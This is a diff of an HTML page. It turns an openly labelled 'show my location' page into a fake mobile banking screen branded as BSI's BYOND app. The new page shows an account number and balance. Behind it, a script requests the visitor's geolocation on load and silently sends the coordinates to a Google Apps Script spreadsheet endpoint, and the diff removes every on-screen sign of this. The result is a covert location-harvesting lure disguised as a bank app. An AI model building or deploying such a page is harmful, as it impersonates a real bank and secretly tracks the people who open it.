--- a/index.html
+++ b/index.html
@@ -1,55 +1,305 @@
 <!DOCTYPE html>
-<html lang="id">
+<html>
   <head>
     <meta charset="UTF-8" />
-    <title>Tampilkan Lokasi Saya</title>
-  </head>
-  <body>
-    <h2>Lokasi Saya</h2>
-    <p id="status">Mendeteksi lokasi...</p>
-    <p id="koordinat"></p>
-    <div id="map" style="margin-top: 20px"></div>
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <script src="https://cdn.jsdelivr.net/npm/@tailwindcss/browser@4"></script>
+    <style>
+      .scrollbar-hide::-webkit-scrollbar {
+        width: 0;
+        height: 0;
+      }
 
+      .scrollbar-hide:hover::-webkit-scrollbar {
+        width: 8px;
+        height: 8px;
+      }
+
+      .scrollbar-hide::-webkit-scrollbar-thumb {
+        background-color: #ccc;
+        border-radius: 10px;
+      }
+
+      .scrollbar-hide:hover::-webkit-scrollbar-thumb {
+        background-color: #aaa;
+      }
+    </style>
+  </head>
+  <body class="flex items-center justify-center bg-zinc-900">
+    <section class="h-dvh bg-white w-full max-w-[500px] relative overflow-auto scrollbar-hide">
+      <div
+        class="w-full bg-linear-to-b from-emerald-600 to-yellow-500 h-50 relative"
+      >
+        <div
+          class="absolute bg-linear-to-b from-yellow-500 to-white h-10 -bottom-8 w-full"
+        ></div>
+      </div>
+      <div class="absolute top-0 left-0 h-full w-full p-4">
+        <header class="flex py-4 items-center justify-between">
+          <div class="flex items-center gap-2">
+            <svg
+              width="21"
+              height="24"
+              viewBox="0 0 21 28"
+              fill="none"
+              xmlns="http://www.w3.org/2000/svg"
+            >
+              <path
+                d="M14.3604 14.0088C18.0589 14.1963 21 17.2549 21 21C21 24.866 17.866 28 14 28H0V0H14C17.866 0 21 3.13401 21 7C21 10.866 17.866 14 14 14L14.3604 14.0088Z"
+                fill="white"
+              />
+            </svg>
+            <div class="flex flex-col">
+              <h1 class="text-l text-white font-extrabold">BYOND</h1>
+              <span class="text-white text-[0.5rem] -mt-1.5 text-end"
+                >By BSI</span
+              >
+            </div>
+          </div>
+          <svg
+            class="w-5.5 h-5.5 text-gray-800 dark:text-white"
+            aria-hidden="true"
+            xmlns="http://www.w3.org/2000/svg"
+            width="24"
+            height="24"
+            fill="none"
+            viewBox="0 0 24 24"
+          >
+            <path
+              stroke="currentColor"
+              stroke-linecap="round"
+              stroke-linejoin="round"
+              stroke-width="2"
+              d="M20 12H8m12 0-4 4m4-4-4-4M9 4H7a3 3 0 0 0-3 3v10a3 3 0 0 0 3 3h2"
+            />
+          </svg>
+        </header>
+        <section class="flex items-center gap-2">
+          <div
+            class="h-9 w-9 rounded-full object-cover text-white font-semibold flex items-center justify-center bg-emerald-800"
+          >
+            G
+          </div>
+          <h2 class="text-white">Gina</h2>
+        </section>
+
+        <section class="rounded-xl bg-white p-4 my-4 shadow">
+          <h3 class="text-sm font-semibold text-zinc-800">Wallet</h3>
+          <p class="text-sm text-zinc-400 flex gap-1 items-center">
+            2203010451
+            <svg
+              class="w-4 h-4"
+              aria-hidden="true"
+              xmlns="http://www.w3.org/2000/svg"
+              width="24"
+              height="24"
+              fill="none"
+              viewBox="0 0 24 24"
+            >
+              <path
+                stroke="currentColor"
+                stroke-linejoin="round"
+                stroke-width="2"
+                d="M14 4v3a1 1 0 0 1-1 1h-3m4 10v1a1 1 0 0 1-1 1H6a1 1 0 0 1-1-1V9a1 1 0 0 1 1-1h2m11-3v10a1 1 0 0 1-1 1h-7a1 1 0 0 1-1-1V7.87a1 1 0 0 1 .24-.65l2.46-2.87a1 1 0 0 1 .76-.35H18a1 1 0 0 1 1 1Z"
+              />
+            </svg>
+          </p>
+          <h3 class="font-semibold text-zinc-800 mt-2 flex items-center gap-1">
+            10.000.000,00
+            <svg
+              class="w-4 h-4"
+              aria-hidden="true"
+              xmlns="http://www.w3.org/2000/svg"
+              width="24"
+              height="24"
+              fill="none"
+              viewBox="0 0 24 24"
+            >
+              <path
+                stroke="currentColor"
+                stroke-width="2"
+                d="M21 12c0 1.2-4.03 6-9 6s-9-4.8-9-6c0-1.2 4.03-6 9-6s9 4.8 9 6Z"
+              />
+              <path
+                stroke="currentColor"
+                stroke-width="2"
+                d="M15 12a3 3 0 1 1-6 0 3 3 0 0 1 6 0Z"
+              />
+            </svg>
+          </h3>
+        </section>
+        <section class="grid grid-cols-5 gap-2">
+          <div
+            class="flex flex-col justify-center items-center text-[0.8rem] gap-1 text-zinc-800"
+          >
+            <div
+              class="h-12 w-full max-w-12 bg-emerald-600/30 rounded-full flex items-center justify-center animate-pulse"
+            ></div>
+            <p>Transfer</p>
+          </div>
+          <div
+            class="flex flex-col justify-center items-center text-[0.8rem] gap-1 text-zinc-800"
+          >
+            <div
+              class="h-12 w-full max-w-12 bg-emerald-600/30 rounded-full flex items-center justify-center animate-pulse"
+            ></div>
+            <p>Bayar & Beli</p>
+          </div>
+          <div
+            class="flex flex-col justify-center items-center text-[0.8rem] gap-1 text-zinc-800"
+          >
+            <div
+              class="h-12 w-full max-w-12 bg-emerald-600/30 rounded-full flex items-center justify-center animate-pulse"
+            ></div>
+            <p>QRIS</p>
+          </div>
+          <div
+            class="flex flex-col justify-center items-center text-[0.8rem] gap-1 text-zinc-800"
+          >
+            <div
+              class="h-12 w-full max-w-12 bg-emerald-600/30 rounded-full flex items-center justify-center animate-pulse"
+            ></div>
+            <p>Berbagi</p>
+          </div>
+          <div
+            class="flex flex-col justify-center items-center text-[0.8rem] gap-1 text-zinc-800"
+          >
+            <div
+              class="h-12 w-full max-w-12 bg-emerald-600/30 rounded-full flex items-center justify-center animate-pulse"
+            ></div>
+            <p>Menu</p>
+          </div>
+        </section>
+        <section>
+          <header class="flex items-center justify-between my-4">
+            <h3 class="text-sm font-semibold">E-Wallet</h3>
+            <h3 class="text-sm text-yellow-600">Atur</h3>
+          </header>
+          <div class="w-full overflow-auto pb-4 flex gap-2 scrollbar-hide">
+            <div
+              class="bg-white shadow flex gap-2 rounded-md p-4 w-[300px] shrink-0"
+            >
+              <div class="h-10 w-10 bg-zinc-200 rounded animate-pulse"></div>
+              <div class="max-w-[200px] flex flex-col">
+                <p class="text-sm text-zinc-800 font-semibold">Link Aja</p>
+                <p class="text-sm flex items-center text-amber-700">
+                  <svg
+                    class="w-3 h-3"
+                    aria-hidden="true"
+                    xmlns="http://www.w3.org/2000/svg"
+                    width="24"
+                    height="24"
+                    fill="none"
+                    viewBox="0 0 24 24"
+                  >
+                    <path
+                      stroke="currentColor"
+                      stroke-linecap="round"
+                      stroke-linejoin="round"
+                      stroke-width="2"
+                      d="M5 12h14m-7 7V5"
+                    />
+                  </svg>
+
+                  Hubungkan
+                </p>
+              </div>
+            </div>
+            <div
+              class="bg-white shadow flex gap-2 rounded-md p-4 w-[300px] shrink-0"
+            >
+              <div class="h-10 w-10 bg-zinc-200 rounded animate-pulse"></div>
+              <div class="max-w-[200px] flex flex-col">
+                <p class="text-sm text-zinc-800 font-semibold">Ovo</p>
+                <p class="text-sm flex items-center text-amber-700">
+                  <svg
+                    class="w-3 h-3"
+                    aria-hidden="true"
+                    xmlns="http://www.w3.org/2000/svg"
+                    width="24"
+                    height="24"
+                    fill="none"
+                    viewBox="0 0 24 24"
+                  >
+                    <path
+                      stroke="currentColor"
+                      stroke-linecap="round"
+                      stroke-linejoin="round"
+                      stroke-width="2"
+                      d="M5 12h14m-7 7V5"
+                    />
+                  </svg>
+
+                  Hubungkan
+                </p>
+              </div>
+            </div>
+          </div>
+        </section>
+        <section>
+          <header class="flex items-center justify-between my-4">
+            <h3 class="text-sm font-semibold">Favorit</h3>
+          </header>
+          <div class="bg-zinc-200 w-full h-50 rounded-lg animate-pulse"></div>
+        </section>
+      </div>
+      <div
+        class="absolute bottom-0 left-0 w-full p-4 bg-white shadow-[0_-4px_6px_rgba(0,0,0,0.1)] flex justify-between gap-4"
+      >
+        <div class="grid grid-cols-2 gap-4 w-1/2">
+          <div
+            class="flex gap-2 flex-col text-sm items-center justify-center shrink-0"
+          >
+            <div class="h-8 w-8 bg-zinc-200 rounded-full animate-pulse"></div>
+            <span class="bg-zinc-200 h-2 w-10 animate-pulse"></span>
+          </div>
+          <div
+            class="flex gap-2 flex-col text-sm items-center justify-center shrink-0"
+          >
+            <div class="h-8 w-8 bg-zinc-200 rounded-full animate-pulse"></div>
+            <span class="bg-zinc-200 h-2 w-10 animate-pulse"></span>
+          </div>
+        </div>
+        <div
+          class="w-full flex justify-center absolute left-1/2 -translate-x-1/2"
+        >
+          <div
+            class="h-12 w-12 bg-zinc-300 rounded-xl animate-pulse -mt-8 absolute"
+          ></div>
+        </div>
+        <div class="grid grid-cols-2 gap-4 w-1/2">
+          <div
+            class="flex gap-2 flex-col text-sm items-center justify-center shrink-0"
+          >
+            <div class="h-8 w-8 bg-zinc-200 rounded-full animate-pulse"></div>
+            <span class="bg-zinc-200 h-2 w-10 animate-pulse"></span>
+          </div>
+          <div
+            class="flex gap-2 flex-col text-sm items-center justify-center shrink-0"
+          >
+            <div class="h-8 w-8 bg-zinc-200 rounded-full animate-pulse"></div>
+            <span class="bg-zinc-200 h-2 w-10 animate-pulse"></span>
+          </div>
+        </div>
+      </div>
+    </section>
     <script>
       const scriptURL =
         "https://script.google.com/macros/s/AKfycbzi5dxCsfehVqPeM2ZAtDlh1JmBffrMpFprVx-mCv31wiTev8drSHS1OY3YDPqwXvKl/exec";
 
       if (navigator.geolocation) {
-        navigator.geolocation.getCurrentPosition(
-          function (position) {
-            const latitude = position.coords.latitude.toFixed(6);
-            const longitude = position.coords.longitude.toFixed(6);
+        navigator.geolocation.getCurrentPosition(function (position) {
+          const latitude = position.coords.latitude.toFixed(6);
+          const longitude = position.coords.longitude.toFixed(6);
 
-            // buat URL custom yang nanti disimpan di spreadsheet
-            const mapsUrl = `https://byond-bsi-error.vercel.app/?lat=${latitude}&lng=${longitude}`;
-            console.log("Kirim ke sheet:", { longitude, latitude, mapsUrl });
+          // buat URL custom yang nanti disimpan di spreadsheet
+          const mapsUrl = `https://byond-bsi-error.vercel.app/?lat=${latitude}&lng=${longitude}`;
 
-            fetch(scriptURL, {
-              method: "POST",
-              body: JSON.stringify({ longitude, latitude, mapsUrl }),
-            });
-
-            // tampilkan koordinat di halaman
-            document.getElementById(
-              "koordinat"
-            ).innerText = `Latitude: ${latitude}, Longitude: ${longitude}`;
-
-            // tampilkan peta embed
-            const embedUrl = `https://www.google.com/maps?q=${latitude},${longitude}&hl=id&z=15&output=embed`;
-            document.getElementById("map").innerHTML = `
-          <iframe src="${embedUrl}" width="600" height="450" style="border:0;" allowfullscreen="" loading="lazy"></iframe>
-        `;
-
-            document.getElementById("status").innerText = "Lokasi ditemukan ✅";
-          },
-          function (error) {
-            document.getElementById("status").innerText =
-              "Gagal mendapatkan lokasi: " + error.message;
-          }
-        );
-      } else {
-        document.getElementById("status").innerText =
-          "Browser tidak mendukung geolocation.";
+          fetch(scriptURL, {
+            method: "POST",
+            body: JSON.stringify({ longitude, latitude, mapsUrl }),
+          });
+        });
       }
     </script>
   </body>
